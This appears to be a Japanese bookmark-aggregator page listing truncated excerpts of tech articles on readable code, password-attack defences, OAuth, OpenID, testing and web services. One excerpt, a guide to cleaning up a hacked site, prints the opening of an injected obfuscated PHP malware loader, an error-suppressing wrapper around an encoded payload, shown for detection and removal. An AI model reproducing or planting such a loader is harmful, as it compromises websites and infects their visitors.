『リーダブルコード』を現場で読み解く! 開発スピードを向上させる、読みやすいコードの書き方【今こそ読み解きたい名著】 - エンジニアHub|Webエンジニアのキャリアを考える!
『リーダブルコード』を現場で読み解く! 開発スピードを向上させる、読みやすいコードの書き方【今こそ読み解きたい名著】 圧倒的名著として知られる『リーダブルコード』ですが、高い評価には理由がある!現役エンジニアが、この一冊を読み込み、変数名の命名法など、読みやすいコードを書く極意とその必要性を抽出します。 数多くの開発者から支持を受け、読み継がれてきた名著。そこには読み継がれる理由があります。 名著には、内容・ボリュームともに充実した書籍が多く、概要に目を通しただけで本を読んだつもりになっていたり、腰を据えて読む時間がなく「積ん読」してしまいがち。「エンジニアが絶対読むべき書籍●選」といった記事をブックマークするだけで読んだつもりになっていないでしょうか。 ポイントを押さえつつ内容を深掘りし、名著の根底に流れるエッセンスを開発に活かしましょう。 アプリエンジニアの池田惇(@jun_ikd)で
パスワード攻撃に対抗するWebサイト側セキュリティ強化策
Webサイトのパスワード認証を狙った攻撃が大きな脅威になっています。 Tサイト(プレスリリース) goo(プレスリリース) フレッツ光メンバーズクラブ(プレスリリース) eBook Japan(プレスリリース) My JR-EAST(プレスリリース) これらの事例のうちいくつか(あるいは全て)は、別のサイトで漏洩したIDとパスワードの一覧表を用いた「パスワードリスト攻撃(後述)」であると考えられています。パスワードリスト攻撃を含めて、パスワードを狙った攻撃が成立してしまう原因は、利用者のパスワード管理に問題がある場合が多く、攻撃を受けたWebサイト側には、直接の責任はないケースが多いと考えられます。 しかしながら、 大半の利用者はパスワード管理に興味がない パスワード認証を採用している理由は、コスト上の理由、すなわちサイト側の経済的な事情 インターネットが「とても危険なもの」となるとネット
iPhoneで無料から使えるクラウドストレージサービス13選【まとめ】 iPhone女史
最近はオンラインストレージサービスが増え、パソコン上だけでなくiPhoneを含むスマホや携帯電話でも利用できるようになりました。ただ、多数のストレージサービスがある中どのサービスが一番使いやすいのか、ストレージ容量がどれだけ違うのか、等々気になる点はいくつもあります。特にストレージサービスを使い始めてみようかな、と検討中の方にとっては選びにくいものです。私自身もそうなのですが。笑 そこで今回、多数あるオンラインストレージサービスの中からiPhoneでも利用できるストレージサービスを集めてみました。 それぞれの特徴やストレージ容量も比較したうえで使い勝手や利用シーンに合わせて、選んでみてはいかがでしょうか。参考になればと思います。 ▼続きはコチラ↓↓ オンラインストレージとは、インターネット上にファイルを保管できるスペースを貸し出すサービス。普段利用しているパソコンだけでなく、他のパ
最近のウェブ系スタートアップが採用しているプログラミング言語やフレームワークまとめ - laiso
http://www.quora.com/Node-js-Ruby-Python-who-wins-in-5-years を読んでて「勝利条件としてより多くの”スタートアップ”に選択されること」という話がでてたけど、そもそも今は何が採用されているのか状況がよくわかたっていなかったので調べた。 スタートアップ? 一般(自分の周辺)に「ウェブサービス」みたいな呼称されているもの。消費者向けというかなんというか、企業向けシステムとか、ソーシャルゲーム単品とかは含めないことにした なんでスタートアップ?(小規模な企業) 企業が大きくなってくると、いろんな領域で必要なことがあってこの企業は→このプログラミング言語みたいなひもづけができなくなるので 項目は =企業ではなく=サービスでわけた 順番、国内外は適当。できるだけ知名度のありそうなサイトを選んだ いわゆるサーバーサイドのアーキテクチャの話(それ
脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
新しくスタートした大容量ファイル転送サービス「Sendoid」がかなり使える!
新しくスタートした大容量ファイル転送サービス「Sendoid」がかなり使える!2011.03.23 21:00 mayumine 新しくリリースされた大容量ファイル転送サービス「Sendoid」これはかなり便利そうです。 RapidshareやMediafire、またDropboxやBittorrentといったサービスの類で、これらの良いとこ取りしたような感じです。 日本のサービスだと、宅ファイル便やデータ便が、ずっとシンプルになって使いやすくなったイメージ。 ファイルを1対1で送りたい場合において最良のサービスであるとTechCrunchが賞賛しているように、ファイル容量、セキュリティ、そしてアップロードとダウンロードの待ち時間においてSendoidは優れています。 誰でも簡単に使えるよう、ブラウザベースのシンプルなインターフェースで完結しているのも素晴らしい点ですね。 使い方はとっても
Webブラウザがまた一歩OSに近づく。「Webアプリケーションをブラウザにインストール」する標準仕様をMozillaが提案
Webブラウザがまた一歩OSに近づく。「Webアプリケーションをブラウザにインストール」する標準仕様をMozillaが提案 Windowsにアプリケーションをインストールするように、あるいはアップルのApp StoreからアプリケーションをダウンロードしてiPhoneにインストールするように、WebブラウザにWebアプリケーションをインストールし、インストールしたアプリケーションを管理し、呼び出して実行するための標準仕様「Open Web Applications」をモジラが提案しました。 インストールしたWebアプリをダッシュボードから起動 メールを読むためにGmailを利用し、友達との会話にはTwitterを使うように、いまやネイティブなアプリケーションを起動する代わりにWebサイトで提供されているWebアプリケーションを利用することが多くなってきました。 さらにHTML5を利用すれば
NoSQLとしてMySQLを使うDeNAが、memcachedよりも高速な75万クエリ/秒を実現
モバゲーで知られるDeNAは、バックエンドデータベースにNoSQLを使っていません。なぜか? それはMySQL/InnoDB 5.1の環境で秒間75万クエリという、多くのNoSQLでも実現できないような高性能を実現しているから。DeNAの松信嘉範(まつのぶよしのり)氏は、自身のブログにこんな内容のエントリ「Using MySQL as a NoSQL - A story for exceeding 750,000 qps on a commodity server」(英語)をボストしています。 Yoshinori Matsunobu's blog: Using MySQL as a NoSQL - A story for exceeding 750,000 qps on a commodity server 松信氏が指摘するように、大規模なネットサービスを提供している企業の多くは分散環境で
ウェブ系エンジニアがおさえておきたい技術ブログまとめ(海外編) - nokunoの日記
こんな記事を見かけたので、海外編を考えてみました。ウェブ系エンジニアがおさえておきたい技術ブログまとめ - Meltdown Countdown例によって特定の分野に趣味嗜好が偏っている可能性があります。あと企業ブログに限りません。あとウェブ系に限りません。っておいおい。 企業系 Official Google BlogOfficial Google Research BlogThe Twitter Engineering BlogFacebook Engineeringさんのノート | FacebookYahoo! Hadoop BlogBlog « Cloudera » Apache Hadoop for the Enterprise クラウド・データマイニング系 myNoSQLRevolutionsmloss | Page not foundData Center Knowledge
100行のCプログラムでWebチャットを実装する方法 - mixi engineer blog
例の冷却ファンを修理してもらいに秋葉原に行ったのですが、最近の同人ゲームのクオリティはすごいなあと感心していたら、その二階はもっととんでもないことになってて、ひとつ大人になってしまったmikioです。今回は、Tokyo Cabinetのテンプレート直列化機能を駆使して、たった100行のCプログラムでWebチャットシステムを実装してみます。 古式ゆかしいWebチャットシステム 10年くらい前にCGIスクリプトでチャットシステムを作るのが流行していたのを覚えている方も多いと思います。チャットログは現在のようにデータベースサーバに転送して格納するのではなく、ローカルファイルシステム上のファイルにCSVやTSVなどのフォーマットで格納したり、同じくローカルのDBMファイルに格納するのが主流でした。2ちゃんねるの「datファイル」もそのようなデータファイルの一種と言えるでしょう。 その頃から、CGI
クイックログインに“穴”、ヤマト運輸の携帯Webサイトに脆弱性
ヤマト運輸は10月25日、同社が提供している会員制サービス「クロネコメンバーズのWebサービス」の携帯電話版で、特定のスマートフォンから特定のアプリケーションを利用し、「クイックログイン機能」を使った場合に、本人と別のユーザーのページにログインができてしまう問題があったと発表した。現在は、クイックログイン機能を修正し、パスワードの入力が必須となっている。 同サービスは、荷物の集荷依頼や再配達依頼などがWeb経由で可能にするもの。同社が調査したところ、1人のユーザーのページに、別の2人がログインしており、メールアドレスや住所、電話番号などを閲覧できる状態になっていた。該当のユーザーには個別に対応しているという。 問題となったのは、ログインID/パスワードを入力せずに認証を行う「クイックログイン機能」(かんたんログインと表記するサイトもある)。多くの携帯電話向けサイトで実装されているこの機能は
ウェブ系エンジニアがおさえておきたい技術ブログまとめ - Meltdown Countdown rev.
もうすぐ2010年も終わり。なんかこの業界、転職ブームな感じがしますね。転職したいですね。圧倒的給与を手にしたいですね。 それにはアウトプットが必要です。そのためには勉強が必要です。 エンジニアたる者、最新のトレンド(の技術)や今年マストアイテム(な技術)をおさえておきたいですね。 そこで役立つ技術系ブログをまとめました。今回は、ウェブ系の会社のオフィシャルなブログに限定しています。やっぱり実際に業務で使われている開発手法や運用手法の紹介は読んでてためになりますよね。 ひとまず16件+コメント頂いて追加。他にもありましたら教えてくれると小躍りして喜びます。 Baidu Japan Blog ECナビ エンジニアブログ GREE Engineers' Blog Hatena::Engineering KLab若手エンジニアの これなぁに? KRAY Inc » ブログ livedoor Te
InstapaperとRead It Laterを比較してみた - 大須は萌えているか?
気になったWEBページを「あとで読む」WEBサービスとしてInstapaperとRead It Laterっていう有名なサービスがあるんですけど、最近になってこの2つのサービスを使い比べてみたのでメモしときます。今更とか言うなー。 InstapaperやRead It Laterを使う理由私の場合、WEBサイトを見て回る起点はほぼGoogle Readerに集約しており、FirefoxなりiPhoneアプリなりからGoogle Readerをチェックして、気になった記事はスターを付けて後でまとめて読む、というスタイルでした。なので、正直「あとで読む」ことに特化したWEBサービスは使う必要が無いと思ってたんですけど、使ってみるとこれがなかなか便利だったりして。 使い始めたきっかけとしては、iPhoneで使っているGoogle ReaderクライアントのReeder(App Storeリンク)
第1回 OAuthとは?―OAuthの概念とOAuthでできること | gihyo.jp
今回から始まった「ゼロから学ぶOAuth」。全4回の特集にて、これからのWebサービスを開発する上で不可欠な技術「OAuth」について取り上げます。初回は、OAuthの概念について取り上げます。 はじめに はじめまして、iKnow!改めsmart.fmの真武です。現在smart.fmでは、OAuthやOpenID、OpenSocial、Semantic WebやActivity Streamなどといった新しい技術の導入を積極的に行いサイトを活性化させるとともに、smart.fm APIを通じて我々の技術を外部のデベロッパの方々にも提供しています。 smart.fmは日本最大のOpenID Relying Partyであるだけでなく、国内では数少ないOAuth Consumer(後述)およびOAuth Service Provider(後述)を兼ねるサービスとなっています。こういった背景
ユニットテストはなぜ必要なの?
開発の全工程の中で、あまり人気がないのがテスト工程だ。ソフトウェアの品質を証明するためのテストは、なぜ低く見られてしまうのか(編集部) そもそもテストはなぜ実施するの? 皆さんはテストと聞いてどういったイメージをお持ちでしょうか。 「面倒くさい」「プログラマの仕事じゃない」「納期直前に徹夜でするもの」「そもそもしない」……。 残念ながら筆者の周りにいる開発者に聞いてみても、あまり人気のある工程とはいえないようです。 さて、本連載で扱うテストとは、もちろん学期末の終わりに実施するような人の知識、習熟度を試すテストではありません。ソフトウェア開発におけるテスト、つまり「ソフトウェアの品質を証明するためのテスト」のことです。自分たちが作り上げたソフトウェアに対して自らテストし品質を評価する工程、そして、テスト結果は常に100点である必要があるという半ば自己満足的な性質を持つ試験のことです。 しか
開発期間はわずか1カ月、今後はiPhoneアプリやAndroidで世界へ――GREE iPhone版の開発者に聞く
快進撃を続けるSNS「GREE」。ついにiPhone対応版が登場したが、開発を担当したのは入社間もないエンジニアだという。開発プロジェクトの裏側について、話を聞いた。 グリーは2010年8月9日、同社のSNS「GREE」のiPhone版のWebサイトを公開した。これを手始めに、今後はスマートフォン対応を強化していく考えだ。このiPhone版Webサイトの開発メンバーに抜擢されたのは、プロジェクト開始時にまだ入社して2週間しか経っていなかった、エンジニアの熊谷健太郎氏である。開発期間はわずか1カ月、担当エンジニアは熊谷氏1人というから、そのスピード感には驚かされる。どのように開発が進められたのか、開発チームに話を聞いた。
短縮URL URL転送の方法 ホームページの転送
URL転送方法 ホームページの転送 短縮URL URL転送とは? URL転送というのは、あるホームページのアドレス(URL)から他のホームページのアドレスへと自動で訪問者を飛ばす仕組みのことです。使用する目的としては以下のようなものが挙げられます。 ホームページのアドレスが変更になったので、新しいアドレスへと飛ばす ページのアドレスが長すぎるので、短いアドレスを公開する(短縮URLと呼ばれます) 商品番号などを判断してそれぞれのページへ飛ばす もちろんこのほかにもURL転送を使う理由はいろいろと考えられます。例えば携帯電話からのアクセスなど、特定の条件によって表示するページを変えるために飛ばすという技もPHPなどのプログラムを使えば実現できます。そのためには転送の技術の他に、条件を判断する技術が必要になりますので、ここでは解説に含めません。 新しいアドレスへの転送 これはアフィリエイトに限
短縮URL
短縮URLとは、Webサイトが使うURLを短く変換したもののこと。Webサービスとして運営されている短縮URLサービスを使うことで、アルファベット数文字程度にする。短くしたURLは、自分のTwitterやブログなどに張り付けて使う。最近はTwitterによって注目されている。Twitterには一つのつぶやき(コメント)に文字数制限があり、コメントに入れるURLを短くしたいというニーズがあるからだ。 「bit.ly」や「TinyURL」などの短縮URLサービスが有名で、「http://bit.ly/」や「http://tinyurl.com/」で始まる短いURLに変換する。ユーザーが短縮URLサービスで短縮URLを作成すると、同サービスには元のURLと短縮URLをマッチングするデータベースができる。自分のTwitterに短縮URLを張り付け、それに誰かがアクセスしたとする。短縮URLのリンク
仕様から学ぶOpenIDのキホン - @IT
にわかに注目を集めている、URLをIDとして利用する認証プロトコル、OpenID。本連載ではこのプロトコルの仕組みを技術的に解説するとともに、OpenIDが今後どのように活用されていくのかを紹介する(編集部) OpenIDってなんだろう? 現在、国内外でにわかに注目されつつあるOpenIDという仕組みを聞いたことがあるでしょうか? これはユーザー中心の分散ID認証システムですが、まだ日本での普及は進んでいない状況です。 これにはいくつか原因が挙げられるでしょうが、筆者はOpenIDが正しく理解されていないことが原因だと考えます。 本連載ではOpenIDの現行仕様、およびその拡張仕様とともに、実装を例に取りつつOpenIDとは何かということを明らかにしていきます。最終的にはOpenIDが切り開く未来を見るため、現在策定中の次期仕様についても触れていきたいと思います。 広がりつつあるブラウザベ
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
プロとしての行為 Act as Proffesional
